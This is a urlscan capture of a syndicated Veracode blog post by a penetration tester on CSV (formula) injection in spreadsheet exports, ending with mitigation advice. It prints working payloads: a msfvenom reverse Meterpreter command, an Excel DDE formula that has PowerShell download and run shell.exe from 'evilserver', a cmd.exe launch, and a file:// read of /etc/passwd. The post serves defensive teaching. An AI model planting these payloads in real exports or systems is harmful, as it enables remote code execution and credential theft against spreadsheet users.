securityboulevard.com
Open in
urlscan Pro
2606:4700:10::ac43:f6b
Public Scan
URL:
http://securityboulevard.com/2019/09/data-extraction-to-command-execution-csv-injection/
Submission: On February 24 via manual from US — Scanned from DE
Submission: On February 24 via manual from US — Scanned from DE
Form analysis
2 forms found in the DOMGET https://securityboulevard.com/
<form action="https://securityboulevard.com/" class="search-form searchform clearfix" method="get">
<div class="search-wrap">
<input type="text" placeholder="Search" class="s field" name="s">
<button class="search-icon" type="submit"></button>
</div>
</form>
POST /2019/09/data-extraction-to-command-execution-csv-injection/
<form method="post" enctype="multipart/form-data" id="gform_10" action="/2019/09/data-extraction-to-command-execution-csv-injection/">
<div class="gform_body gform-body">
<ul id="gform_fields_10" class="gform_fields top_label form_sublabel_below description_below">
<li id="field_10_1" class="gfield gfield_contains_required field_sublabel_below field_description_below hidden_label gfield_visibility_visible"><label class="gfield_label" for="input_10_1">Email<span class="gfield_required"><span
class="gfield_required gfield_required_asterisk">*</span></span></label>
<div class="ginput_container ginput_container_email">
<input name="input_1" id="input_10_1" type="text" value="" class="large" placeholder="Your Email" aria-required="true" aria-invalid="false">
</div>
</li>
<li id="field_10_2" class="gfield gfield_html gfield_html_formatted gfield_no_follows_desc field_sublabel_below field_description_below gfield_visibility_visible">
<div class="gsection_description"><a href="https://securityboulevard.com/privacy-policy/">View Security Boulevard <u>Privacy Policy</u></a></div>
</li>
<li id="field_10_3" class="gfield gform_hidden field_sublabel_below field_description_below gfield_visibility_visible">
<div class="ginput_container ginput_container_text"><input name="input_3" id="input_10_3" type="hidden" class="gform_hidden" aria-invalid="false" value=""></div>
</li>
<li id="field_10_4" class="gfield gform_hidden field_sublabel_below field_description_below gfield_visibility_visible">
<div class="ginput_container ginput_container_text"><input name="input_4" id="input_10_4" type="hidden" class="gform_hidden" aria-invalid="false" value=""></div>
</li>
<li id="field_10_5" class="gfield gfield--width-full field_sublabel_below field_description_below hidden_label gfield_visibility_visible"><label class="gfield_label" for="input_10_5">CAPTCHA</label>
<div id="input_10_5" class="ginput_container ginput_recaptcha gform-initialized" data-sitekey="6Ld9rm8cAAAAAEa1mXDqRlCvlsP8t1u1weqyOCJn" data-theme="light" data-tabindex="-1" data-size="invisible" data-badge="bottomright">
<div class="grecaptcha-badge" data-style="bottomright"
style="width: 256px; height: 60px; display: block; transition: right 0.3s ease 0s; position: fixed; bottom: 14px; right: -186px; box-shadow: gray 0px 0px 5px; border-radius: 2px; overflow: hidden;">
<div class="grecaptcha-logo"><iframe title="reCAPTCHA"
src="https://www.google.com/recaptcha/api2/anchor?ar=1&k=6Ld9rm8cAAAAAEa1mXDqRlCvlsP8t1u1weqyOCJn&co=aHR0cDovL3NlY3VyaXR5Ym91bGV2YXJkLmNvbTo4MA..&hl=en&v=1B_yv3CBEV10KtI2HJ6eEXhJ&theme=light&size=invisible&badge=bottomright&cb=14db33q3md9l"
width="256" height="60" role="presentation" name="a-yikv3jyr79uk" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox"
tabindex="-1"></iframe></div>
<div class="grecaptcha-error"></div><textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response"
style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea>
</div><iframe style="display: none;"></iframe>
</div>
</li>
<li id="field_10_6" class="gfield gform_validation_container field_sublabel_below field_description_below gfield_visibility_visible"><label class="gfield_label" for="input_10_6">Phone</label>
<div class="ginput_container"><input name="input_6" id="input_10_6" type="text" value=""></div>
<div class="gfield_description" id="gfield_description_10_6">This field is for validation purposes and should be left unchanged.</div>
</li>
</ul>
</div>
<div class="gform_footer top_label"> <input type="submit" id="gform_submit_button_10" class="gform_button button" value="Subscribe Now"
onclick="if (!window.__cfRLUnblockHandlers) return false; if(window["gf_submitting_10"]){return false;} window["gf_submitting_10"]=true; "
onkeypress="if (!window.__cfRLUnblockHandlers) return false; if( event.keyCode == 13 ){ if(window["gf_submitting_10"]){return false;} window["gf_submitting_10"]=true; jQuery("#gform_10").trigger("submit",[true]); }">
<input type="hidden" class="gform_hidden" name="is_submit_10" value="1">
<input type="hidden" class="gform_hidden" name="gform_submit" value="10">
<input type="hidden" class="gform_hidden" name="gform_unique_id" value="">
<input type="hidden" class="gform_hidden" name="state_10" value="WyJbXSIsImExN2ZmNzMxNzRmOWUyZjU4NDM0NzI5MzVhYzMzZjI2Il0=">
<input type="hidden" class="gform_hidden" name="gform_target_page_number_10" id="gform_target_page_number_10" value="0">
<input type="hidden" class="gform_hidden" name="gform_source_page_number_10" id="gform_source_page_number_10" value="1">
<input type="hidden" name="gform_field_values" value="">
</div>
<p style="display: none !important;"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js" value="1645689652768"></p>
</form>
Text Content
Thursday, February 24, 2022 * Insurance Won’t Pay for Identity Fraud Losses * CIS Control 15: Service Provider Management * Turn Microsoft Defender into an Unbeatable Security Solution * Zero Trust for MSP’s: What is it, and What are the Benefits? * BSidesAugusta 2021 – Stephen Semmelroth’s ‘Resumes Are Stupid (But You Still Need One)’ * * * * * * * SECURITY BOULEVARD The Home of the Security Bloggers Network Community Chats Webinars Library * Home * Cybersecurity News * Features * Industry Spotlight * News Releases * Security Bloggers Network * Latest Posts * Contributors * Syndicate Your Blog * Write for Security Boulevard * Events * Upcoming Events * Upcoming Webinars * On-Demand Events * On-Demand Webinars * Chat * Security Boulevard Chat * Marketing InSecurity Podcast * Library * Related Sites * Techstrong Group * Container Journal * DevOps.com * Security Boulevard * Techstrong Research * Techstrong TV * Devops Chat * DevOps Dozen * DevOps TV * Digital Anarchist * Media Kit * About Us * Analytics * AppSec * CISO * Cloud * DevOps * GRC * Identity * Incident Response * IoT / ICS * Threats / Breaches * More * Blockchain / Digital Currencies * Careers * Cyberlaw * Mobile * Social Engineering * Humor TwitterLinkedInFacebookRedditEmailShare Security Bloggers Network Home » Security Bloggers Network » Data Extraction to Command Execution CSV Injection DATA EXTRACTION TO COMMAND EXECUTION CSV INJECTION by jrougvie@veracode.com (jrougvie) on September 6, 2019 As web applications get more complex and more data driven, the ability to extract data from a web application is becoming more common. I work as a principal penetration tester on Veracode’s MPT team, and the majority of web applications that we test nowadays have the ability to extract data in a CSV format. The most common software installed in corporate environments is Microsoft Excel, and this software has the ability to open CSV files (in most cases, this is the default). It should be noted that this type of attack would also affect LibreOffice as it would also interpret the payload as formula. ATTACK REQUIREMENTS In order to perform a basic attack, a number of requirements are needed. An attacker needs the ability to inject a payload into the tables within the application. The application needs to allow a victim to download this data into CSV format that can then be opened in Excel. This would cause the payload to be interpreted as an Excel formula and run. BASIC ATTACK 1. Search the application to find a location where any data input can be extracted. FIGURE1.PNG 2. Inject Payload =HYPERLINK(“http://www.veracode.com “, “Click for Report”) FIGURE2.PNG 3. Confirm the application is vulnerable to this type of attack. Extract the data and confirm the payload has been injected by opening the CSV file in Microsoft Excel. FIGURE3.PNG 4. You can then see a “Click for Report link” in the Excel File. This indicates the payload has been injected correctly. FIGURE4.PNG In this scenario, when the victim clicks on the link, it will take them to the Veracode website. This type of attack might not seem too serious, but consider the following: Instead of redirecting an end user to the Veracode website, we could redirect the end user to a server we controlled, which contained a clone of the website. We could then ask the victim to authenticate to our clone website, allowing us as the attacker to steal his or her credentials. We could then use these credentials on the original website and have access to all his or her personal information or any functionality the account has access to. There are also a number of other attacks possible with this type of formula injection, including exfiltrating sensitive data, obtaining remote code execution, or even reading the contents of certain files under the right circumstances. We can look at one of these types of attacks below. ADVANCE ATTACK – REMOTE COMMAND EXECUTION A more advanced attack would use the same method as above but with a different payload, which would lead to remote code execution. This type of attack does depend on a number of factors and might not always be possible. However, it’s still worth considering and also highlights how serious this vulnerability can be under the right circumstances. ATTACK IN STEPS 1. We’ll use a shell.exe file, which can contain whatever we want to execute on the system but, in this scenario, we will use msfvenom to create a reverse Meterpreter payload. msfvenom -p windows/meterpreter/reverse_tcp -a x64 –platform Windows LHOST=<IP Address> LPORT=1234 -f exe > shell.exe 2. We also need to set up a listener that will wait for the connect back to us once the shell.exe payload has been executed on the victim’s machine. We will use Metasploit multi/handler for this example. We need to set the LPORT and also make sure the IP address is correct. FIGURE5.PNG 3. We also need to host the shell.exe payload so it can be downloaded. For this, I used the following command, python -m SimpleHTTPServer 1337, which will set up a simple web server in the current directory on my system. A real attack might host this on a compromised web server. 4. Once all this has been set up, we could then inject the payload into the application and wait for a victim to download the CSV file and click on the cell with the payload in it. =cmd|’ /C powershell Invoke-WebRequest “http://evilserver:1337/shell.exe“ -OutFile “$env:Temp\shell.exe”; Start-Process “$env:Temp\shell.exe”‘!A1 BREAKDOWN OF PAYLOAD * The first line is calling cmd, which gets passed to the PowerShell Invoke-WebRequest to download a shell.exe file from our evilserver on port 1337. Note that if the host is running PowerShell version 2, the Invoke-WebRequest won’t work. * The next line is saving the shell.exe file into the temp directory. The reason we use the temp directory is because it’s a folder anyone can write to. * We then start a process to execute the downloaded shell.exe payload. 5. Once the victim opens the file, the CSV injection payload would run. However, it may present a “Remote Data Not Accessible” warning. The chances are that most victims would think the file has come from a legitimate source and so they need to select yes to view the data. It should also be noted that in this scenario the Excel file is empty apart from our payload. In a real-world attack, the Excel file would be populated with information from the application. 6. Once the victim selects yes, within a few moments, Metasploit will get a reverse connect from the victim’s host. FIGURE6.PNG 7. At this point, the attacker can perform a number of tasks depending on the level of access he or she has obtained. This includes, but is not limited to, stealing passwords in memory, attacking other systems in the network (if this host is connected to a network), taking over uses’ webcams, etc. In fact, under the right circumstances, it would be possible to compromise an entire domain using this attack. When testing for CVS injections, in most instances, a tester will use a simple payload. This is due to a number of reasons. It’s not uncommon for a tester to demonstrate this type of attack by using a Hyperlink payload like the one above, or a simple cmd payload like the following =cmd|’/C cmd.exe ’!’A. Some might also use the following payload depending on the operating system: =’file://etc/passwd’#$passwd.A1 This would read the first line within the etc/passwd file on a Linux system. MITIGATING THE RISK The best way to mitigate against this type of attack is to make sure all users’ inputs are filtered so only expected characters are allowed. Client-supplied inputs should always be considered unsafe and treated with caution when processing. CVS injection is a side effect of bad input validation, and other types of web attacks are due to weak input validation. To mitigate against CVS injections, a default-deny regular expression or “whitelist” regular expression should be used to filter all data that is submitted to the application. Because Excel and CSV files utilize equals signs (=), plus signs (+), minus signs (-), and “At” symbols (@) to denote formulas, we recommend filtering these out to ensure no cells begin with these characters. Any element that could appear in a report could be a target for Excel / CSV injections and should be further validated for CSV injection. In summary, CSV injection is not a new attack vector, but it’s one that developers often forget about. As more web applications have the ability to extract data, it’s one that could have serious consequences if steps are not taken to mitigate the risk it poses. In addition, developers should be checking user input for other types of attacks like XSS. Recent Articles By Author * The Top Five Web Application Authentication Vulnerabilities We Find More from jrougvie@veracode.com (jrougvie) *** This is a Security Bloggers Network syndicated blog from RSS | Veracode Blog authored by jrougvie@veracode.com (jrougvie). Read the original post at: http://www.veracode.com/blog/secure-development/data-extraction-command-execution-csv-injection September 6, 2019September 6, 2019 jrougvie@veracode.com (jrougvie) * ← Unalaska Recovers $2.3 Million Following Phishing Attack * The top vendor management processes to automate → TECHSTRONG TV – LIVE Watch latest episodes and shows SUBSCRIBE TO OUR NEWSLETTERS Get breaking news, free eBooks and upcoming events delivered to your inbox. * Email* * View Security Boulevard Privacy Policy * * * CAPTCHA * Phone This field is for validation purposes and should be left unchanged. Δ MOST READ ON THE BOULEVARD Ice Phishing Takes Advantage of Tectonic Shift to Web3 $3 Million Hack of NFTs—‘And Nothing of Value was Lost’ Puttin’ Putin on Notice—We Will Hack Russia Back The Data Security and Data Backup Disconnect Emerging Trends in Malware Themes From Momentum Cyber’s 2022 Cybersecurity Almanac Coinbase Fixes Vulnerable API that Let You Sell Bitcoin You Didn’t Own The Ultimate Guide to Selecting the Right Cyber Security Partner to Protect Your Applications XKCD ‘Chorded Keyboard’ Email Security Trends Coming in 2022 UPCOMING WEBINARS Thu 24 BAD ACTORS ARE TARGETING NPMS: HOW TO PROTECT YOUR SUPPLY CHAIN February 24 @ 11:00 am - 12:00 pm Thu 24 MITIGATING RISKS IN SOFTWARE SUPPLY CHAIN SECURITY February 24 @ 12:00 pm - 1:00 pm Mar 01 AUTOMATING SECURITY CONTROLS ACROSS CONTAINER WORKLOADS WITH SNYK, DOCKER AND AWS March 1 @ 9:00 am - 10:00 am Mar 01 WHY ZERO-TRUST SEGMENTATION BEATS CVE CHASING ALL DAY, EVERY DAY March 1 @ 11:00 am - 12:00 pm Mar 01 BEST PRACTICES FOR SECURE DEVELOPMENT 2022 March 1 @ 3:00 pm - 4:00 pm Mar 02 CSIOTALK MASTER CLASS EPISODE: CATCH LIGHTNING IN A BOTTLE March 2 @ 11:00 am - 12:00 pm Mar 02 THE 2022 API SECURITY CHECKLIST March 2 @ 1:00 pm - 2:00 pm Mar 02 CONTAINERIZED APPSEC FROM CODE TO PRODUCTION WITH SNYK, SYSDIG AND AWS March 2 @ 3:00 pm - 4:00 pm Mar 03 THE SECRET TO EFFECTIVE SECRETS MANAGEMENT March 3 @ 3:00 pm - 4:00 pm Mar 15 INTEGRATE SECURITY CONTROLS WHEREVER YOU BUILD APPLICATIONS March 15 @ 9:00 pm - 10:00 pm More Webinars DOWNLOAD FREE EBOOK INDUSTRY SPOTLIGHT Cyberlaw Cybersecurity Data Security Identity & Access Industry Spotlight Security Boulevard (Original) INSURANCE WON’T PAY FOR IDENTITY FRAUD LOSSES February 24, 2022 Mark Rasch | 1 hour ago 0 Analytics & Intelligence Application Security Cloud Security Cyberlaw Cybersecurity Data Security DevOps DevSecOps Editorial Calendar Endpoint Featured Governance, Risk & Compliance Incident Response Industry Spotlight IoT & ICS Security Malware Mobile Security Most Read This Week Network Security News Popular Post Security Awareness Security Boulevard (Original) Social Engineering Spotlight Threat Intelligence Threats & Breaches Vulnerabilities PUTTIN’ PUTIN ON NOTICE—WE WILL HACK RUSSIA BACK February 22, 2022 Richi Jennings | 1 day ago 0 Analytics & Intelligence Application Security Blockchain Cloud Security Cyberlaw Cybersecurity Data Security DevOps DevSecOps Digital Currency Editorial Calendar Featured Governance, Risk & Compliance Identity & Access Incident Response Industry Spotlight Malware Most Read This Week News Popular Post Security Boulevard (Original) Social Engineering Spotlight Threat Intelligence Threats & Breaches Vulnerabilities $3 MILLION HACK OF NFTS—‘AND NOTHING OF VALUE WAS LOST’ February 21, 2022 Richi Jennings | 2 days ago 0 TOP STORIES Cybersecurity Data Security Featured Incident Response Malware News Security Boulevard (Original) Spotlight Vulnerabilities RETROSPECT SIMPLIFIES PROTECTING DATA FROM RANSOMWARE February 18, 2022 Michael Vizard | Feb 18 0 Cloud Security Cybersecurity Featured Network Security News Security Boulevard (Original) Spotlight F5 DELIVERS SECURITY SERVICES VIA THE CLOUD February 15, 2022 Michael Vizard | Feb 15 0 Analytics & Intelligence Application Security Cloud Security Cyberlaw Cybersecurity Data Security DevOps DevSecOps Editorial Calendar Featured Governance, Risk & Compliance Incident Response Most Read This Week Network Security News Popular Post Security Boulevard (Original) Spotlight Threat Intelligence Threats & Breaches OH! CANADA—TRUCK PROTEST DONOR PII HACKED February 15, 2022 Richi Jennings | Feb 15 0 SECURITY HUMOR JOY OF TECH® ‘THE GHOST OF MYSPACE’ JOIN THE COMMUNITY * Add your blog to Security Bloggers Network * Write for Security Boulevard * Bloggers Meetup and Awards * Ask a Question * Email: info@securityboulevard.com USEFUL LINKS * About * Media Kit * Sponsors Info * Copyright * TOS * DMCA Compliance Statement * Privacy Policy RELATED SITES * Techstrong Group * Container Journal * DevOps.com * Techstrong Research * Techstrong TV * DevOps Chat * DevOps Dozen * DevOps TV * Digital Anarchist * * * * * * * Copyright © 2022 Techstrong Group Inc. All rights reserved. ✓ Thanks for sharing! AddToAny More… Notifications previousnextslideshow